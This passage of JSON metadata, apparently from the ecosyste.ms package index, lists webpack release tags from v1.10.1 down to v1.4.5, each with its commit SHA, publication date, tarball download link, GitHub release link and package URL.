ack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13